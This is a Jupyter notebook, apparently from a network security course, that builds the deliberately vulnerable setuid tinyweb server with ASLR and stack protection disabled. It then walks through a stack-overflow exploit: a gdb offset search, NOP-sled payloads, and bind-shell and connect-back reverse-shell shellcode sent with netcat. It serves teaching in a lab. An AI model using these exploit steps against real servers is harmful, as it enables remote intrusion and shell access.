# Network Exploitation

## A Simple Server Example

- a server that listens for TCP connection on port 7890
- when a client connects it sends a message *Hello there!* and receives data until connection is closed
- see demos/simple_server/ folder 
    - main.cpp and utility.h are the two files required to build the simple server
    - use the provided Makefile to build and run the executable
    
```
$ g++ main.cpp -o simple_server.exe
$ ./simple_server.exe
$ telnet 127.0.0.1 7890
```

In [1]:
# check the working directory
%pwd

'/home/kali/projects/NetworkSecurity'

In [2]:
# list files and folders from current working directory
! ls

00-TableOfContents.ipynb   nmapResults.txt
arp-spoofing.png	   nmapResults.xml
booksrc			   README.md
demos			   resources
graph.svg		   ScapyIntro.ipynb
hosts.txt		   ScapyScripts.ipynb
icmp.pcap		   ScapySendReceivePackets.ipynb
LICENSE			   SniffingWithScapy.ipynb
NetworkExploitation.ipynb  tracegraph.svg
Networking.ipynb	   Traceroute-BashVsScapy.ipynb
NetworkSniffing.ipynb	   washington.html
NetworkUtility.ipynb


In [3]:
# change working directory to demos/simple_server
%cd demos/simple_server

/home/kali/projects/NetworkSecurity/demos/simple_server


In [5]:
! ls -al

total 84
drwxr-xr-x 2 kali kali  4096 Jun 22 16:02 .
drwxr-xr-x 3 kali kali  4096 Jun 22 15:34 ..
-rw-r--r-- 1 kali kali  2011 Jun 22 16:07 main.cpp
-rw-r--r-- 1 kali kali 25540 Jun 22 16:02 main.o
-rw-r--r-- 1 kali kali   797 Jun 22 15:54 Makefile
-rwxr-xr-x 1 kali kali 32948 Jun 22 16:02 simple_server.exe
-rw-r--r-- 1 kali kali  1207 Jun 22 15:35 utility.h


In [6]:
! cat main.cpp

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <iostream>
#include "utility.h"

#define PORT 7890	// the port users will be connecting to

using namespace std;

int main(void) {
	int sockfd, new_sockfd;  // listen on sock_fd, new connection on new_fd
	struct sockaddr_in host_addr, client_addr;	// my address information
	socklen_t sin_size;
	int recv_length=1, yes=1;
	char buffer[1024];

	if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1)
		fatal("in socket");

	if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1)
		fatal("setting socket option SO_REUSEADDR");
	
	host_addr.sin_family = AF_INET;		 // host byte order
	host_addr.sin_port = htons(PORT);	 // short, network byte order
	host_addr.sin_addr.s_addr = INADDR_ANY; // automatically fill with my IP
	memset(&(host_addr.sin_zero), '\0', 8); // zero the rest of the struct

	if (bind(sockfd, (struct soc

In [7]:
! cat utility.h

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// A function to display an error message and then exit
void fatal(char *message) {
   char error_message[100];

   strcpy(error_message, "[!!] Fatal Error ");
   strncat(error_message, message, 83);
   perror(error_message);
   exit(-1);
}

// An error checked malloc() wrapper function
void *ec_malloc(unsigned int size) {
   void *ptr;
   ptr = malloc(size);
   if(ptr == NULL)
      fatal("in ec_malloc() on memory allocation");
   return ptr;
}

// dumps raw memory in hex byte and printable split format
void dump(char *data_buffer, const unsigned int length) {
	unsigned char byte;
	unsigned int i, j;
	for(i=0; i < length; i++) {
		byte = data_buffer[i];
		printf("%02x ", data_buffer[i]);  // display byte in hex
		if(((i%16)==15) || (i==length-1)) {
			for(j=0; j < 15-(i%16); j++)
				printf("   ");
			printf("| ");
			for(j=(i-(i%16)); j <= i; j++) {  // display printable bytes from line
				byte = data_buffer[j];
				if((byt

In [9]:
! cat Makefile

# rule for compiling program

COMPILER = g++
COMPILER_FLAGS = -c -g -Wall -std=c++17 -m32
BUILD_FLAGS = -m32 -fno-stack-protector -z execstack -no-pie

# list .cpp files separated by space
CPP_FILES = main.cpp

# executable program name
PROGRAM_NAME = simple_server.exe

# rule for compiling and building program
# make or make all triggers the following rule
build:
	# disable ASLR
	echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
	# compiles .cpp to object file .o
	$(COMPILER) $(COMPILER_FLAGS) $(CPP_FILES)
	# builds executable from object files
	$(COMPILER) $(BUILD_FLAGS) -o $(PROGRAM_NAME) *.o

# rule for running programming
# make run triggers the following rule
run:
	./$(PROGRAM_NAME)

# rule for clean up
# make clean triggers the following rule
clean:
	rm -f $(PROGRAM_NAME) *.o

In [8]:
# compile and build the executable
! echo kali | sudo -S make

# disable ASLR
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
0
# compiles .cpp to object file .o
g++ -c -g -Wall -std=c++17 -m32 main.cpp
In file included from main.cpp:9:
utility.h: In function ‘void* ec_malloc(unsigned int)’:
utility.h:20:13: warning: ISO C++ forbids converting a string constant to ‘char*’ []8;;https://gcc.gnu.org/onlinedocs/gcc/Warning-Options.html#index-Wwrite-strings-Wwrite-strings]8;;]
   20 |       fatal("in ec_malloc() on memory allocation");
      |             ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
main.cpp: In function ‘int main()’:
main.cpp:23:9: warning: ISO C++ forbids converting a string constant to ‘char*’ []8;;https://gcc.gnu.org/onlinedocs/gcc/Warning-Options.html#index-Wwrite-strings-Wwrite-strings]8;;]
   23 |   fatal("in socket");
      |         ^~~~~~~~~~~
main.cpp:26:9: warning: ISO C++ forbids converting a string constant to ‘char*’ []8;;https://gcc.gnu.org/onlinedocs/gcc/Warning-Options.html#index-Wwrite-strings-Wwrite-strings

### run  ./simple_server.exe from a terminal

```bash
┌──(kali㉿K)-[~/projects/NetworkSecurity/demos/simple_server]
└─$ make run                                                                 
./simple_server.exe
Server running on: 0.0.0.0:7890
```

- notice the log as clients connect to it

### install telnet client if not found

In [5]:
! telnet --help

telnet: invalid option -- '-'
Usage: telnet [-4] [-6] [-8] [-E] [-L] [-a] [-d] [-e char] [-l user]
	[-n tracefile] [ -b addr ] [-r] [host-name [port]]


In [10]:
! echo kali | sudo -S apt install telnet

Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
telnet is already the newest version (0.17-42).
0 upgraded, 0 newly installed, 0 to remove and 62 not upgraded.


### run telnet client from another terminal
- interact with the server by sending some data on telnet prompt
```bash
telnet server_ip port
```
- telnet is line-buffered, hit enter to send data
    - e.g., hi from cleint...[enter]
- when done enter `ctrl ]` to close connection on telnet client prompt >
- enter quit command to quit the telnet client
```
telnet>quit
```


```bash
┌──(kali㉿K)-[~]
└─$ telnet 127.0.0.1 7890 
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
Hello there!
hi from client...
```

### simple_server log as the client sends data
```bash
┌──(kali㉿K)-[~/projects/NetworkSecurity/demos/simple_server]
└─$ make run                                                                 
./simple_server.exe
Server running on: 0.0.0.0:7890
server: got connection from 127.0.0.1 port 38656
RECV: 19 bytes
68 69 20 66 72 6f 6d 20 63 6c 69 65 6e 74 2e 2e | hi from client..
2e 0d 0a                                        | ...
```


### run telnet from a remote system
- interact with the server by sending some data on telnet prompt
- tlenet is line-buffered, hit enter to send data
- when done enter ctrl+] to close connection on telnet client prompt >

```bash
    telnet <server ip> 7890
    this is a test from a remote system...
    here's some more data...
    do you read this from another system?
    ctrl+]
```

### check simple_serve log on the terminal
- notice `\x0D` and `\x0A` at the end of every data sent
- telnet and HTTP protocols expect lines/data to be terminted with these two bytes
    - carriage return and new line feed

In [12]:
# lets check the ASCII table
! man ascii | egrep "Hex|0A|0D"

       Oct   Dec   Hex   Char                        Oct   Dec   Hex   Char
       012   10    0A    LF  '\n' (new line)         112   74    4A    J
       015   13    0D    CR  '\r' (carriage ret)     115   77    4D    M


### telnet to a webserver
- open a terminal
- issue HEAD / HTTP/1.0 command and enter twice

```bash 
┌──(kali㉿K)-[~]
└─$ telnet example.com 80                                                                                1 ⨯
Trying 93.184.216.34...
Connected to example.com.
Escape character is '^]'.
HEAD /index.html HTTP/1.0 <--- HTTP HEAD Request
[enter][enter]

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/html
Date: Tue, 22 Jun 2021 22:49:43 GMT
Last-Modified: Tue, 22 Jun 2021 22:44:04 GMT
Server: ECS (dna/63B1)
Content-Length: 94
Connection: close

Connection closed by foreign host.
```

- issue GET request

```bash
┌──(kali㉿K)-[~]
└─$ telnet example.com 80                                                                                1 ⨯
Trying 93.184.216.34...
Connected to example.com.
Escape character is '^]'.
GET /index.html HTTP/1.0

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/html
Date: Tue, 22 Jun 2021 22:51:39 GMT
Last-Modified: Tue, 22 Jun 2021 22:44:04 GMT
Server: ECS (dna/63B1)
Content-Length: 94
Connection: close

<html><head><title>edgecastcdn.net</title></head><body><h1>edgecastcdn.net</h1></body></html>
Connection closed by foreign host.
```

## A Tiny Web Server
- similar to simple server but uses HTTP protocol to communicate
- handles HTTP GET and HEAD requests
- looks for the requested resource in the local directory callled `webroot` and sends it to the client/browser
- if the file/resource is not found, the server responds with 404 HTTP (`File Not Found`) error in response
- the demo web server is found in `demos/tiny_web/` folder
- use the provided Makefile to compile and build the Tinuweb server

```bash
    sudo compile.sh tinyweb.c tinyweb.exe
    sudo chown root ./tinyweb.exe
    sudo chmod u+s ./tinyweb.exe
    ./tinyweb.exe
```

In [13]:
# check the current working directory
%pwd

'/home/kali/projects/NetworkSecurity/demos/simple_server'

In [ ]:
%cd ../tinyweb

In [10]:
! cp booksrc/tinyweb.c .
! cp booksrc/hacking-network.h .
! cp booksrc/hacking.h .
! cp booksrc/compile.sh .

In [11]:
! cat tinyweb.c

#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include "hacking.h"
#include "hacking-network.h"

#define PORT 80   // the port users will be connecting to
#define WEBROOT "./webroot" // the web server's root directory

void handle_connection(int, struct sockaddr_in *); // handle web requests
int get_file_size(int); // returns the filesize of open file descriptor

int main(void) {
   int sockfd, new_sockfd, yes=1; 
   struct sockaddr_in host_addr, client_addr;   // my address information
   socklen_t sin_size;

   printf("Accepting web requests on port %d\n", PORT);

   if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1)
      fatal("in socket");

   if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1)
      fatal("setting socket option SO_REUSEADDR");

   host_addr.sin_family = AF_INET;      // host byte order
   host_addr.sin_port = htons

In [12]:
! cp -r booksrc/webroot .
! ls -l webroot

total 52
-rwxr-xr-x 1 kali kali 46794 Sep 16 16:24 image.jpg
-rw-r--r-- 1 kali kali   261 Sep 16 16:24 index.html


In [13]:
! cat webroot/index.html

<html>
<head><title>A sample webpage</title></head>
<body bgcolor="#000000" text="#ffffffff">
<center>
<h1>This is a sample webpage</h1>
...and here is some sample text<br>
<br>
..and even a sample image:<br>
<img src="image.jpg"><br>
</center>
</body>
</html>


In [14]:
! cat hacking-network.h

/* This function accepts a socket FD and a ptr to the null terminated
 * string to send.  The function will make sure all the bytes of the
 * string are sent.  Returns 1 on success and 0 on failure.
 */
int send_string(int sockfd, unsigned char *buffer) {
   int sent_bytes, bytes_to_send;
   bytes_to_send = strlen(buffer);
   while(bytes_to_send > 0) {
      sent_bytes = send(sockfd, buffer, bytes_to_send, 0);
      if(sent_bytes == -1)
         return 0; // return 0 on send error
      bytes_to_send -= sent_bytes;
      buffer += sent_bytes;
   }
   return 1; // return 1 on success
}

/* This function accepts a socket FD and a ptr to a destination
 * buffer.  It will receive from the socket until the EOL byte
 * sequence in seen.  The EOL bytes are read from the socket, but
 * the destination buffer is terminated before these bytes.
 * Returns the size of the read line (without EOL bytes).
 */
int recv_line(int sockfd, unsigned char *dest_buffer) {
#define EOL "\r\n" // End-Of-Line by

In [15]:
! echo kali | sudo -S ./compile.sh tinyweb.c tinyweb.exe

[sudo] password for kali: tinyweb.c: In function ‘handle_connection’:
tinyweb.c:101:16: warning: implicit declaration of function ‘read’; did you mean ‘fread’? [-Wimplicit-function-declaration]
  101 |                read(fd, ptr, length); // read the file into memory
      |                ^~~~
      |                fread
tinyweb.c:105:13: warning: implicit declaration of function ‘close’; did you mean ‘pclose’? [-Wimplicit-function-declaration]
  105 |             close(fd); // close the file
      |             ^~~~~
      |             pclose


In [16]:
! cat hacking.h

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// A function to display an error message and then exit
void fatal(char *message) {
   char error_message[100];

   strcpy(error_message, "[!!] Fatal Error ");
   strncat(error_message, message, 83);
   perror(error_message);
   exit(-1);
}

// An error checked malloc() wrapper function
void *ec_malloc(unsigned int size) {
   void *ptr;
   ptr = malloc(size);
   if(ptr == NULL)
      fatal("in ec_malloc() on memory allocation");
   return ptr;
}

// dumps raw memory in hex byte and printable split format
void dump(const unsigned char *data_buffer, const unsigned int length) {
	unsigned char byte;
	unsigned int i, j;
	for(i=0; i < length; i++) {
		byte = data_buffer[i];
		printf("%02x ", data_buffer[i]);  // display byte in hex
		if(((i%16)==15) || (i==length-1)) {
			for(j=0; j < 15-(i%16); j++)
				printf("   ");
			printf("| ");
			for(j=(i-(i%16)); j <= i; j++) {  // display printable bytes from line
				byte = data_buffer[

In [17]:
! echo kali | sudo -S chown root:root ./tinyweb.exe

[sudo] password for kali: 

In [18]:
! ls -al tinyweb.exe

-rwxr-xr-x 1 root root 22488 Sep 18 14:22 tinyweb.exe


In [19]:
! echo kali | sudo -S chmod u+s ./tinyweb.exe

[sudo] password for kali: 

In [20]:
! ls -al tinyweb.exe

-rwsr-xr-x 1 root root 22488 Sep 18 14:22 tinyweb.exe


### run tinyweb.exe from a terminal
### open a browser and browse to localhost

## Tinyweb Stack Overflow Exploitation

- crash the Tinyweb server
- pawn the system

## Crash the Tinyweb server

- use a different VM or a machine (attacker machine)
- generate a junk data of 1000 bytes and send it to the server


In [ ]:
! python -c 'print("A"*1000, end="\r\n")' > junk.txt

In [ ]:
# replace telnet_serverip and port

! cat junk.txt | nc -v [severip] [port]

## Pawn the system

- find the overlfow vulnerability
- find the return address and offset from request buffer
- run the tinyweb.exe and get its process id to attach it to the gdb

```bash
$ ps aux | grep tinyweb
```

- Attach gdb to the tinyweb server

```
$ sudo gdb -q --pid=[tinywebpid] --symbols=./tinyweb.exe
```

- use gdb to examine memory and addresses

```bash
$ list
$ list main
$ list 44 # list 10 lines around line #44
$ break 62 # break at recv_line function that has overrun issue

$ continue # make a get request using a terminal or browser to hit the breakpoint
$ print request
$ print /x &request # Note the address of request variable
(gdb) p /x &request
$1 = 0xffffc1b0

$ x/16wx request+500 # examine 16 words at request+500 bytes in stack - return address must be definitely 500 bytes away from request!

$ bt  # gives the return address to main
#0  handle_connection (sockfd=4, client_addr_ptr=0xffffc3e4) at tinyweb.c:62
#1  0x08049724 in main () at tinyweb.c:48

$ x/x $ebp+4 # prints the return address
$2 = 0xffffc3cc

$ p /u <return address> - <request address> # OFFSET to return address
540


$ p /x request+100 # find the address of about 100 bytes from the base of request (controlled return address)

$4 = 0xffffc214 

```

- exit the debugger and rerun the server on the same terminal

## Local Shellcode Exploit
- create a exploit code and send it to the server
- use a different terminal on the same system
- total length of string buffer is the offset or difference between the return address - request buffer + 4 bytes

```
| repeated NOP SLED \x90 | exploit code | repeated controlled return addrees that will land somewhere in NOP SLED |

```

- nop sled count = total length + 4 - exploit code length - 30 x 4 (size of return address)

```bash
echo $((540+4-24-30*4)) = 400
```

- find soft landing address in NOP sled about 100 bytes away from the base address; just for safety!

```bash
printf "%x" $((address of request + 100))
```

- create and send the final exploit code from a different terminal

```bash
echo -n $(perl -e 'print "\x90"x400'; cat shellcode.bin; perl -e 'print "landing address in reverse order"x30 . "\r\n"') > tinyexploit.txt
cat tinyexploit.txt | nc -v 127.0.0.1 [port]
```

- you'll get a local shell on the terminal where tinyweb.exe is running

## Remote Exploit - Port Binding Shellcode

- use a different VM or system as an attacker machine
- create Port Binding Shellcode Exploit
- Generate Shellcode using GDB PEDA
- add about 100 bytes to the beginning address of request to get the working landing address

```
gdb-peda$ shellcode generate
gdb-peda$ shellcode generate x86/linux bindport  port ip
$ perl -e 'print "copy line by line"' >> bindport.bin
$ echo -n $(perl -e 'print "\x90"x384'; cat bindport.bin; perl -e 'print "landing address in reverse order"x30 . "\r\n"') > tinyexploit.bin
$ cat tinyexploit.txt | nc -v ip port
```

- from another shell use **nc** to connect to the victim ip using the shellcode port

```bash
nc -v [ip] [port]
``` 

- connecting to the victim machine is not easy due to firewall and IDS, IPS, etc.
- however, outgoing connection is typically allowed
- use the following exploit!

## Remote Exploit - Connect-back Shellcode

- use a different VM or system as an attacker machine
- create connect back (TCP Reverse connect) shellcode
- Generate Shellcode using GDB PEDA
- add about 100 bytes to the beginning address of request to get the working landing address

```bash 
gdb-peda$ shellcode generate x86/linux connect port ip

```

- write shellcode to a file as binary one line at a time


```bash
$ echo -n -e "shellcode line1" > reverse_tcp.bin
$ echo -n -e "shellcode line2" >> reverse_tcp.bin
...
```

- calculate [\<NOP sled>*n + reverse_tcp.bin + \<repeated return address>]
- repeated return address = \<address of request> + 100
- run a server on attacker machine so the victim can connect back

```bash
    nc -v -l -p port
```

- create the exploit code and send it as a request to the Tinyweb server using netcat

```bash
$ echo -n -e $(perl -e 'print "\x90"xn; cat reverse_tcp.bin; perl -e 'print "controlled return add"xN . "\r\n"' | nc -v [ip] [port]
```